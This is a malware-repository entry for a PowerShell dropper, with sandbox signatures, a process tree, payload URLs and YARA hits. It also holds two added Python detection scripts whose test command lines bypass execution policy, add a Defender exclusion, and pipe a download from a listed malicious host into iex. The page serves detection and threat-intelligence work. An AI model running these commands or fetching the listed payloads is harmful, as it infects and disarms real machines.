MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 ba257177a52bb0c3d310d7370d065c5452d1cbfb4e405e2cd494b9e4d71e1bb8. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry



Threat unknown


Vendor detections: 7



SHA256 hash: ba257177a52bb0c3d310d7370d065c5452d1cbfb4e405e2cd494b9e4d71e1bb8
SHA3-384 hash: 32833420e221cb4cdf63f823dedbf4febe99a7d43b2174d3c1dd94751f7c621ccd25aa88948204e11f92ed6b37ddb600
SHA1 hash: 1bea16b0748c6f74c95ebab8cbdbf6bbd77544d3
MD5 hash: 782620289b264b95241a91b9d087a438
humanhash: indigo-cardinal-south-lemon
File name: gets.ps1
File size: 8'192 bytes
First seen: 2025-05-06 07:04:47 UTC
Last seen: Never
File type: PowerShell (PS) ps1
MIME type: text/plain
ssdeep: 192:N7ysfnvynOzad4POVk1Gyp/SD2zKDUtXDZABygKlkO7BGTG:tlkhKIq
TLSH: T1CCF1D81BD9048216C37373EA5991CD0DE78F009F92139F1D75ACA8843BB135D8AF69AB
Magika: powershell
Reporter: abuse_ch
Tags: ps1

Intelligence


File Origin
# of uploads: 1
# of downloads: 93
Origin country: NL
Vendor Threat Intelligence
Verdict:
Malicious
Score:
92.5%
Tags:
autorun dropper shell virus
Verdict:
Malicious
Threat level:
  10/10
Confidence:
100%
Tags:
anti-vm evasive obfuscated powershell
Result
Threat name:
n/a
Detection:
malicious
Classification:
expl.evad
Score:
100 / 100
Signature
Adds a directory exclusion to Windows Defender
AI detected malicious Powershell script
Antivirus detection for URL or domain
Bypasses PowerShell execution policy
Command shell drops VBS files
Found suspicious powershell code related to unpacking or dynamic code loading
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Passes commands via pipe to a shell (likely to bypass AV or HIPS)
PE file has nameless sections
Powershell creates an autostart link
Powershell drops PE file
Sigma detected: Potential Startup Shortcut Persistence Via PowerShell.EXE
Sigma detected: Potential WinAPI Calls Via CommandLine
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Powerup Write Hijack DLL
Sigma detected: Suspicious Invoke-WebRequest Execution
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Yara detected Powershell download and execute
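The signature and Sigma titles above describe what the sandbox saw in the PowerShell command lines of this sample: an execution-policy bypass, an Add-MpPreference exclusion passed as a Base64-encoded command, a download piped into Invoke-Expression, and scripts executed from the user's AppData directory. The script below is an added example, not code from MalwareBazaar or from the sandbox vendor. It decodes -EncodedCommand payloads (UTF-16LE, then Base64, which is why the encoded text is invisible to naive string matching) and applies equivalent checks to a few constructed command lines; the command lines are illustrative, and the only page-derived element in them is the conecwinlab.com URL from the Dropper Extraction list.

```python
import base64
import re
from typing import Optional


def encode_ps(script: str) -> str:
    """Encode a script the way powershell.exe -EncodedCommand expects it."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed command lines (not taken from the sandbox report).
SAMPLE_CMDLINES = [
    r"powershell.exe -nop -w hidden -ep bypass -f C:\Users\user\AppData\Roaming\StartGet2.ps1",
    "powershell.exe -NoProfile -EncodedCommand "
    + encode_ps("Add-MpPreference -ExclusionPath $env:APPDATA"),
    # Hypothetical stage-1 download; the URL is one of the Dropper Extraction entries on this page.
    "powershell.exe -ec "
    + encode_ps("iwr https://conecwinlab.com/getapp.ps1 -UseBasicParsing | iex"),
    r"powershell.exe -Command Get-ChildItem C:\Windows\Temp",  # benign control
]

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...),
# so match the switch loosely and let the decoder reject non-payload arguments.
ENCODED_FLAG = re.compile(r"(?i)(?:^|\s)-e\w*\s+([A-Za-z0-9+/=]{8,})")

# Checks named after the sandbox/Sigma titles on this page; patterns are illustrative.
RULES = [
    ("Bypasses PowerShell execution policy",
     re.compile(r"(?i)(?:^|\s)-e\w*\s+(?:bypass|unrestricted)\b")),
    ("Adds a directory exclusion to Windows Defender",
     re.compile(r"(?i)\b(?:Add|Set)-MpPreference\b.*-Exclusion(?:Path|Extension|Process)")),
    ("Suspicious Invoke-WebRequest Execution",
     re.compile(r"(?i)\b(?:Invoke-WebRequest|iwr|curl|wget)\b.*\|\s*(?:iex|Invoke-Expression)\b")),
    ("Suspicious PowerShell Parameter Substring",
     re.compile(r"(?i)(?:^|\s)-(?:nop|noni|ec|ep|w\s+hidden)\b")),
    ("Suspicious Script Execution From Temp Folder",
     re.compile(r"(?i)\\(?:AppData\\(?:Roaming|Local)|Temp)\\\S+\.(?:ps1|vbs|bat)\b")),
]


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded script if the command line carries an -EncodedCommand payload."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        text = base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):  # not Base64, or not UTF-16LE text
        return None
    # Reject byte noise that happens to decode (e.g. "-ExecutionPolicy Unrestricted").
    if all(ch.isprintable() or ch in "\r\n\t" for ch in text):
        return text
    return None


def analyse(cmdline: str) -> dict:
    """Run every rule over the raw command line plus its decoded payload, if any."""
    decoded = decode_encoded_command(cmdline)
    haystack = cmdline if decoded is None else f"{cmdline} {decoded}"
    hits = [name for name, rx in RULES if rx.search(haystack)]
    # The encoded-MpPreference Sigma title only applies when the cmdlet was hidden in Base64.
    if decoded is not None and re.search(r"(?i)MpPreference", decoded):
        hits.append("Powershell Base64 Encoded MpPreference Cmdlet")
    return {"cmdline": cmdline, "decoded": decoded, "hits": hits}


def scan(cmdlines=SAMPLE_CMDLINES) -> list:
    return [analyse(c) for c in cmdlines]


if __name__ == "__main__":
    for r in scan():
        print(r["cmdline"][:60], "->", r["hits"] or ["clean"])
```

The rules deliberately run over the concatenation of the raw command line and the decoded payload: the execution-policy and abbreviated-switch checks live on the outer command line, while the MpPreference and download-and-execute checks only become visible after decoding.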
Behaviour
Behavior Graph ID: 1681877; Sample: gets.ps1; Start date: 06/05/2025; Architecture: WINDOWS; Score: 100

Top-level domains/IPs: winpopcach.com; raw.githubusercontent.com; 3 other IPs or domains
Top-level signatures: Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; Multi AV Scanner detection for dropped file; 12 other signatures

Process tree (node numbers as in the sandbox graph):
2 gets.ps1 (start)
  13 powershell.exe
     network: modulowinapp.com 185.255.122.89:443 (source ports 49693, 49707; ICMESE, Netherlands); winpopcach.com 185.255.122.94:443 (source ports 49692, 49706; ICMESE, Netherlands); raw.githubusercontent.com 185.199.111.133:443 (source port 49709; FASTLYUS, Netherlands)
     dropped: C:\Users\user\AppData\Roaming\...\libssv.dll (PE32); C:\Users\user\AppData\Roaming\...\libspv.dll (PE32); C:\Users\user\AppData\...\libeay32.dll (PE32); 5 other malicious files
     signatures: Suspicious powershell command line found; Bypasses PowerShell execution policy; Adds a directory exclusion to Windows Defender; 3 other signatures
     22 cmd.exe
        34 cmd.exe
           signatures: Passes commands via pipe to a shell (likely to bypass AV or HIPS)
           51 cmd.exe
              signatures: Wscript starts Powershell (via cmd or directly)
              71 powershell.exe
           54 cmd.exe
              73 cmd.exe
              75 cmd.exe
           56 conhost.exe
           69 (14 other processes)
        37 conhost.exe
     24 powershell.exe
        signatures: Adds a directory exclusion to Windows Defender
        39 powershell.exe
           signatures: Loading BitLocker PowerShell Module
           58 conhost.exe
           60 WmiPrvSE.exe
     27 Enigma32g.exe
        41 chrome.exe
           network: 192.168.2.8, ports 138, 443, 49395
           62 chrome.exe
              network: www.google.com 142.250.188.228:443 (source port 49718; GOOGLEUS, United States); winpopcach.com
     32 (2 other processes)
  18 wscript.exe
     signatures: Wscript starts Powershell (via cmd or directly); Windows Scripting host queries suspicious COM object (likely to drop second stage); Suspicious execution chain found
     29 powershell.exe
        dropped: C:\Users\user\AppData\Roaming\StartGet2.bat (DOS batch)
        signatures: Suspicious powershell command line found; Found suspicious powershell code related to unpacking or dynamic code loading; Powershell drops PE file
        44 cmd.exe
           dropped: C:\Users\user\AppData\Roaming\StartGet2.vbs (ASCII)
           signatures: Suspicious powershell command line found; Wscript starts Powershell (via cmd or directly); Command shell drops VBS files
           65 cscript.exe
              77 cmd.exe
                 signatures: Wscript starts Powershell (via cmd or directly)
                 80 powershell.exe
                    dropped: C:\Users\user\AppData\Roaming\libssv.dll (PE32); C:\Users\user\AppData\Roaming\libspv.dll (PE32); C:\Users\user\AppData\Roaming\libeay32.dll (PE32); C:\Users\user\...\NavegadorExclusivo.exe (PE32)
                    signatures: Loading BitLocker PowerShell Module
                    86 NavegadorExclusivo.exe
                       88 chrome.exe
                 84 conhost.exe
           67 conhost.exe
        47 powershell.exe
           dropped: C:\Users\user\AppData\Roaming\StartGet2.ps1 (ASCII)
        49 conhost.exe
  20 svchost.exe
     network: 127.0.0.1
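The process tree above is the parent/child pattern that the "WScript or CScript Dropper", "Wscript starts Powershell (via cmd or directly)" and "Suspicious execution chain found" signatures key on: a script host under the user profile spawns cmd.exe, which spawns PowerShell, which eventually executes a dropped PE from AppData. The script below is an added example, not code from the sandbox vendor or MalwareBazaar. It rebuilds process ancestry from a handful of constructed process-creation events modelled on that chain and applies those three checks plus an "Executes dropped EXE" check; the PIDs are invented and the full path of NavegadorExclusivo.exe is assumed (the report truncates it).

```python
import re
from dataclasses import dataclass
from typing import Dict, List

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
INTERPRETERS = SCRIPT_HOSTS | SHELLS
USER_DIR = re.compile(r"(?i)\\(?:AppData\\(?:Roaming|Local)|Temp)\\")
SCRIPT_EXT = re.compile(r"(?i)\.(?:vbs|js|jse|wsf)\b")
EXE_PATH = re.compile(r"(?i)\\[^\\\s\"]+\.exe(?:\"|\s|$)")


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str      # image base name, lower-case (as a Sysmon event 1 would give it)
    cmdline: str


# Constructed events modelled on the sandbox chain
# wscript -> powershell -> cmd -> cscript -> cmd -> powershell -> NavegadorExclusivo.exe.
# PIDs are invented; the full path of NavegadorExclusivo.exe is an assumption.
EVENTS = [
    ProcEvent(1000, 1, "explorer.exe", "explorer.exe"),
    ProcEvent(1010, 1000, "wscript.exe", r'wscript.exe "C:\Users\user\AppData\Roaming\StartGet2.vbs"'),
    ProcEvent(1020, 1010, "powershell.exe", r"powershell.exe -ep bypass -f C:\Users\user\AppData\Roaming\StartGet2.ps1"),
    ProcEvent(1030, 1020, "cmd.exe", r"cmd.exe /c C:\Users\user\AppData\Roaming\StartGet2.bat"),
    ProcEvent(1040, 1030, "cscript.exe", r"cscript.exe //nologo C:\Users\user\AppData\Roaming\StartGet2.vbs"),
    ProcEvent(1050, 1040, "cmd.exe", r"cmd.exe /c powershell -w hidden -f C:\Users\user\AppData\Roaming\StartGet2.ps1"),
    ProcEvent(1060, 1050, "powershell.exe", r"powershell -w hidden -f C:\Users\user\AppData\Roaming\StartGet2.ps1"),
    ProcEvent(1070, 1060, "navegadorexclusivo.exe", r"C:\Users\user\AppData\Roaming\NavegadorExclusivo.exe"),
    ProcEvent(1080, 1000, "powershell.exe", "powershell.exe -Command Get-Date"),  # benign control
]


def _ancestors(by_pid: Dict[int, ProcEvent], ev: ProcEvent) -> List[ProcEvent]:
    """Parent, grandparent, ... until the ppid is unknown (or a PID-reuse cycle is hit)."""
    chain, seen, pid = [], {ev.pid}, ev.ppid
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(by_pid[pid])
        pid = by_pid[pid].ppid
    return chain


def detect(events: List[ProcEvent]) -> Dict[int, List[str]]:
    """Map each PID to the list of rule names it triggers (empty list if clean)."""
    by_pid = {e.pid: e for e in events}
    findings: Dict[int, List[str]] = {e.pid: [] for e in events}
    for ev in events:
        ancestors = _ancestors(by_pid, ev)
        parent = ancestors[0] if ancestors else None
        hits = findings[ev.pid]
        # 1. A script host running a .vbs/.js dropped under the user profile.
        if ev.image in SCRIPT_HOSTS and USER_DIR.search(ev.cmdline) and SCRIPT_EXT.search(ev.cmdline):
            hits.append("WScript or CScript Dropper")
        # 2. PowerShell whose nearest non-cmd ancestor is a script host (cmd.exe hops are ignored).
        if ev.image in {"powershell.exe", "pwsh.exe"}:
            launcher = next((a for a in ancestors if a.image != "cmd.exe"), None)
            if launcher is not None and launcher.image in SCRIPT_HOSTS:
                hits.append("Wscript starts Powershell (via cmd or directly)")
        # 3. Four or more nested interpreters in one lineage.
        depth = sum(1 for p in [ev, *ancestors] if p.image in INTERPRETERS)
        if ev.image in INTERPRETERS and depth >= 4:
            hits.append("Suspicious execution chain found")
        # 4. A shell or PowerShell launching a non-interpreter EXE from a user-writable directory.
        if (parent is not None and parent.image in SHELLS and ev.image not in INTERPRETERS
                and USER_DIR.search(ev.cmdline) and EXE_PATH.search(ev.cmdline)):
            hits.append("Executes dropped EXE")
    return findings


if __name__ == "__main__":
    images = {e.pid: e.image for e in EVENTS}
    for pid, hits in detect(EVENTS).items():
        if hits:
            print(pid, images[pid], hits)
```

Ancestry is rebuilt from the event stream rather than read off a live process table because the intermediate cmd.exe and conhost.exe processes in this chain are short-lived; the cycle guard in _ancestors matters on real telemetry, where PID reuse can make a parent appear to be its own descendant.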
Result
Malware family:
n/a
Score:
  10/10
Tags:
discovery execution
Behaviour
Checks processor information in registry
Enumerates system info in registry
Modifies data under HKEY_USERS
Modifies registry class
Runs ping.exe
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of WriteProcessMemory
Browser Information Discovery
Enumerates physical storage devices
System Location Discovery: System Language Discovery
System Network Configuration Discovery: Internet Connection Discovery
Launches sc.exe
Drops startup file
Executes dropped EXE
Loads dropped DLL
Blocklisted process makes network request
Command and Scripting Interpreter: PowerShell
Malware Config
Dropper Extraction:
https://conecwinlab.com/getapp.ps1
https://conecwinlab.com/getapp2.ps1
https://massgrave.dev/troubleshoot
Please note that we are no longer able to provide a coverage score for Virus Total.

YARA Signatures


MalwareBazaar uses YARA rules from several public and non-public repositories, such as YARAhub and Malpedia. Those are being matched against malware samples uploaded to MalwareBazaar as well as against any suspicious process dumps they may create. Please note that only results from TLP:CLEAR rules are being displayed.

Rule name: detect_powershell
Author: daniyyell
Description: Detects suspicious PowerShell activity related to malware execution

Rule name: Detect_PowerShell_Obfuscation
Author: daniyyell
Description: Detects obfuscated PowerShell commands commonly used in malicious scripts.

Rule name: Disable_Defender
Author: iam-py-test
Description: Detect files disabling or modifying Windows Defender, Windows Firewall, or Microsoft Smartscreen

File information


The table below shows additional information about this malware sample such as delivery method and external references.

Delivery method: Web download (distributed via web download)
Sample: PowerShell (PS) ps1 ba257177a52bb0c3d310d7370d065c5452d1cbfb4e405e2cd494b9e4d71e1bb8 (this sample)

Comments